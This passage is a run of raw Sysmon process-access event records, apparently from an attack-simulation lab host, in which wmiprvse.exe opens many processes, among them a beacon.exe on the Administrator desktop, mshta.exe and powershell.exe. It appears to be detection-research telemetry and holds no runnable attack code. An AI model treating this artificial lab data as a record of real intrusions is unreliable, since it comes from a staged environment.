Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.873{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 